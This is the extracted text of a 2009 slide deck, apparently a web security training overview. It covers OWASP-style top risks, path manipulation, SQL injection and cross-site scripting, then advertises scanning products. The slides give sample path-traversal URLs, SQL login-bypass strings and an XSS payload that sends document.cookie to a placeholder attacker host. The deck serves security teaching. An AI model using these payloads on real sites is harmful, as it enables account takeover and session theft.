web security overview lohika asc team 2009 [email protected]
TRANSCRIPT
2
Agenda
Web Security Overview
The Evolution of Web Applications ……………...................3
Common Web Application Functions ………………………..5
Server/Browser Information Flow and Vulnerabilities ……...6
The Security Aspects ………………………………………….8
Web Security Assessment Main Stages……………………10
Web Application Vulnerabilities - Top 10……………………14
Path Manipulation Attack …………………………………….21
Parameter Manipulation Attack ……………………………..25
ASC Products Overview ………………………………….…36
3
Web Security Overview
Ea
rly
da
ys o
f In
tern
et • Web sites were static docs
• One-way information flow: Server -> Browser
• No authentication/authorization• Low interest for malicious intruders:
no sensitive information stored, everything in public view
• Typically attackers modified the files to deface the site
• Attackers used the server’s storage and bandwidth to distribute “warez” C
urr
en
t da
ys
• The majority of site are web applications
• Web applications rely on two-way information flow: Server <-> Browser
• Web applications are different and complicated:• Different technologies• Registration• Login• Financial transactions• Web search• Authoring of content by users• Content generated on fly• Content tailored to specific user =>
Security is a big issue!
The Evolution of Web Applications
4
Rapid evolution of web applications:
No longer a set of static pages
Rely on multiple tech layers and concepts to provide interactive content Replacing desktop applications in many areas
Are used everywhere
Web Security Overview The Evolution
of Web Applications
5
Web Security Overview
2. Shopping
1. Social Networking
5. Banking
8 .Web Search
3. Auctions
7 .Gambling
6 .Web logs
4. Web mail
9. Interactive information
Common Web Application Functions
Potenti
al l
y Not
Secure
For an example: My Space – Samy Wormhttp://namb.la/popular/tech.html
6
Web Security Overview
Browser
FirewallHTTP Server
Auth ServiceWeb Service
Database
Browser
External User
Internal User
Internal HTTP Server
Server Infrastructure
Two-way information flow: Server Browser
7
Web Security Overview
Browser
External User
FirewallHTTP Server
Auth ServiceWeb Service
Database
Browser
Internal User
Internal HTTP Server
Server Infrastructure
XML Injection
Path Traversal
SQL Injection
ParameterTampering
Forged TokenXSS
CSRF
Local File Include
Remote File Inclusion
Two-way information flow: Server Browser
8
Web Security Overview
Application security sometimes gets overlooked by Dev, QA or Operations teams for various reasons:
• Risks involved are underestimated / not fully realized
• Lack of competence
• Lack of time
Any business that relies on a vulnerable web application is potentially at risk of having a major business impact with serious implications.
The Security Aspect In recent years, Web application security has
become a focal center for security experts. Application attacks are constantly on the rise, posing new risks for the organization.
9
Web Security Overview
This is a problem
The Security Aspect
10
Web Security Assessment main stages
Web Security Overview
11
Web Security Overview Map the Application’s
content
1.1 Explore visible content
1.2 Consult public
resources
1 Linked Content
2.1 Discover hidden content
2.2 Discover default content
2 Other Content
3.1 Identifier-specified functions
3.2 Debug parameters
3 Non-standard access
methods
12
Web Security Overview
Analyze the Application
1. Identify functionality
2. Identify data entry points
3. Identify technologies
Attack Vectors
13
Web Security Overview Attack patterns and goals
14
Web Security Overview
InjectionExamples of injection flaws are SQL, XML, LDAP, HTTP header injection (cookies, requests), and OS command injectionsAttacks occur when untrusted data, such as a query, command or argument, is sent to an interpreterVulnerable applications can be tricked into executing unintended commands or allowing the attacker to access, and modify, data
Cross Site ScriptingThere are three types of XSS attacks: stored, reflected, and Dom basedXSS attacks occur when an application allows data that is not validated or escaped properly to be sent to a web browserMalicious scripts are executed in the victim’s browser allowing the attacker to hijack the user’s session, steal cookies, deface web sites, redirect users to malicious web sites, and remote browser control
Web Application Vulnerabilities Top 10
15
Web Security Overview
Broken Authentication and Session ManagementUsers are impersonated due to leaks or flaws in the authentication processAttacks occur when a session ID is visible to others, timeouts are not properly set, SSL/TLS is not used, or any other flaw in the authentication scheme is detectedFlaws used against one account may be replicated against an account with higher privileges
Insecure Direct Object ReferencesAttack occurs when an authorized user can change a parameter value that refers to a system object that they are not authorized forAlmost any reference that can be reached by URL to include: references to files, paths, database keys, reflection by class name (e.g. JDBC connector class)Remote referencing includes: Web Services, CORBA, RMI, RPC
Web Application Vulnerabilities Top 10
(Continued)
16
Web Security Overview
Cross Site Request Forgery (CSRF)Attacker creates malicious code to generate a forged request that the attacker tricks the victim into submittingForged requests can be hidden in image tags, XSS attacks and a number of other techniquesCSRF attacks can complete any transactions that the victim is permitted to perform such as access data, transfer funds or make purchases
Security MisconfigurationAttacker exploits unsecured pages, default accounts, unpatched flaws or any other vulnerability that could have be addressed by proper configurationThese attacks can result in a complete system compromise
Web Application Vulnerabilities Top 10
(Continued)
17
Web Security Overview
Failure to Restrict URL AccessThis attack takes place when an authorized user can simply change a URL to access a privileged pageAttackers generally look for administrative functions to employ this attack onLinks can be obtained from: hidden fields, client-side code, robots.txt, configuration files, static XML files, directory access
Unvalidated Redirects and ForwardsUnvalidated parameter allows an attacker to choose a destination page where they wish to send a victim to trick them into disclosing private informationVictims trust these links because the link is to a valid site
Web Application Vulnerabilities Top 10
(Continued)
18
Web Security Overview
Insecure Cryptographic StorageThe most common reason for this attack is that data that should be encrypted is stored in cleartextCan result from the poor use of encryption algorithms such as using home grown algorithms, insecure use of strong algorithms or the continued use of proven weak algorithmsThe use of weak or unsalted hashes to protect passwords is another common flaw that leads to this risk
Insufficient Transport Layer ProtectionMost commonly, this attack occurs when a site does not use SSL/TLS for pages that require authentication where an attacker can monitor network traffic to steal an authenticated user’s session cookiePoorly configured SSL certificates can lull a user into accepting warnings for legitimate sites only to be tricked into accepting a phishing site’s certificateAttacks can lead to account theft, phishing attacks and admin accounts being compromised
Web Application Vulnerabilities Top 10
(Continued)
19
Path Manipulation attacks andParameter Manipulation attacks
Web Security Overview
20
One of the most dangerous and most common attack techniques are:
Web Security Overview
Path manipulation:
Directory Indexing
Path Traversal
Predictable resource location
Path Truncation
Parameter manipulation:
Abnormal input
Brute Force Authentication
Attack
SQL Injection
SOAP Injection
Command Execution
Cross Site Scripting
(XSS)
Attack Techniques
21
Path manipulation: 1. Directory Indexing
Directory Indexing
Backup files
Temporary files
Hidden files
Naming conventions
Configuration file contents
Script Contents
Automatic directory listing/indexing is a web server function that lists all of the files within a requested directory.
The following information could be obtained based on directory indexing data:
Note: if directory contain(index.html/home.html/default.htm) the normal base file is not present.
Web Security Overview
22
Example:
1.Given the following URLhttp://www.site.com/folder1/folder2/file.asp
2.truncating the path to look forhttp://www.site.com/folder1/folder2/
3.andhttp://www.site.com/folder1/
may cause the webserver to reveal directory contents or to cause unhandled exceptions.
Path truncation attacks are requests for known directories without filenames.
This may cause directory listings to be displayed
Path manipulation: 2. Path Truncation
Web Security Overview
23
Path manipulation: 3. Path Traversal
These attacks are expressions in the URI that will cause the Web server to display the
contents of files above the webroot
Example:
1.Given the following URLhttp://www.site.com/folder1/../../../../../../../boot.ini
2.Or following http://www.site.com/getnews.php?name=../../../../../../boot.ini
it can occurs while web application uses the string to specify a file location without first completely parsing out traversal characters
Web Security Overview
24
Path manipulation: 4. Predictable Resource location. Directory enumeration
Directory enumeration lists all directory paths and possibilities on the application server,
including hidden directories that could possibly contain sensitive information
Web Security Overview
25
HTTP GET request with query parameters
HTTP POST request with parameters
HTTP Cookies
Custom HTTP headers
Web Security Overview Parameter manipulation:
Where can we find the Entry Points of web application?
26
Parameter manipulation: 1. Abnormal input.
parameter overflow
Abnormal input attack strings are composed of characters that can cause unhandled exceptions.
Unhandled exceptions often cause error messages to be displayed that disclose sensitive information about the application’s internal mechanics.
Source code may even be disclosed
Example:
1.Given the following URLhttp://www.site.com/cgi-bin/process.pl?id=%00 (where %00 is poisonous null byte )
2.Or following http://www.site.com/cgi-bin/process.pl?id=99999999999999999
Web Security Overview
27
Parameter manipulation:2. Brute Force authentication
attack.
.
The brute force attack is a method of obtaining a user's authentication credentials application’s internal mechanics.
Using brute force, attackers attempt combinations of the accepted character set in order to find a specific combination that gains access to the authorized area
Web Security Overview
28
Parameter manipulation: 3. SQL injectionSimple injection with ‘OR true’ construction:
Identify the availability of SQL injection use Incorrectly filtered escape characters:This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. This results in the potential manipulation of the statementsperformed on the database by the end user of the application.
Example: ?login=aaa' (get error: You have an error in your SQL syntax…)
?login=aaa‘ OR 1=1 OR ‘bbb (use “or 1=1” signatures)
SQL query: SELECT `id`,`login`,`pass` FROM `users` WHERE login=‘aaa’ OR 1=1 OR ‘bbb’ AND pass=‘qwert’;
Example:SQL query: SELECT `id`,`login`,`pass` FROM `users` WHERE login=‘admin‘ AND pass=‘qwert’;
Web Security Overview
29
Parameter manipulation: 3. SQL injection
Web Security Overview
30
Example:
1.Given the following URLhttp://www.site.com/login.php?name=Vlad&password=12345
2. After login the “Welcome Vlad to our site” message appears on the site page
3. What happens if user name will be following:http://www.site.com/login.php?name=anyuser’ OR 1=1 --&password=unknown
4. of course - SQL query: SELECT `id`,`login`,`pass` FROM `users` WHERE login=‘anyuser’ OR 1=1 --’ AND pass=‘unknown’;
5. You are logged under anyuser !!!
Web Security Overview Parameter manipulation:
3. SQL injection
31
Web Security Overview
User (is a victim)
User (is a victim)
User (is a victim)
popular Web Portal(forum,gallery,livejournal,etc..)
Code injection into client-side (web browser)
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.
Parameter manipulation: 5. Cross Site Scripting
32
Web Security Overview
Simple XSS Attack
http://myserver.com/test.jsp?name=Stefan
Example:
<HTML>
<Body> Welcome Stefan </Body>
</HTML>
Parameter manipulation: 5. Cross Site Scripting
33
Web Security Overview
http://myserver.com/welcome.jsp?name=<script>alert("Attacked")</script>
<HTML>
<Body>
Welcome <script>alert("Attacked")</script>
</Body>
</HTML>
Parameter manipulation: 5. Cross Site Scripting
34
Example:
6.Try to login under following user name:http://www.site.com/login.php?name=<script>alert(111);</script>’ OR ‘1=1#&password=…
7. After login the “Welcome <script>alert(111);</script>’ OR ‘1=1# to our site” message appears in html source of this page. As a result, The popup message box with “111” appears – it is XXS !!!
8. What happens if user name will be following: <script>alert(document.cookies);</script>’ OR =‘1 9. And what happens if user name will be following: <script> document.writeln("<img src=http://myhackersite.com/?a=" + document.cookie + ">“ ); </script>’ OR 1=1#
Web Security Overview Parameter manipulation:
5. Cross Site Scripting
35
ASC Products Overview
Web Security Overview
36
Application Security Center Product Overview
WebInspect
QAInspect
Assessment Management Platform (AMP)
Web Security Overview
37
Web Security Overview Security Center Product
Overview – Entire SuiteSecurityInspect
SecurityInspect
SecurityInspect
38
Q. A.
?
Web Security Overview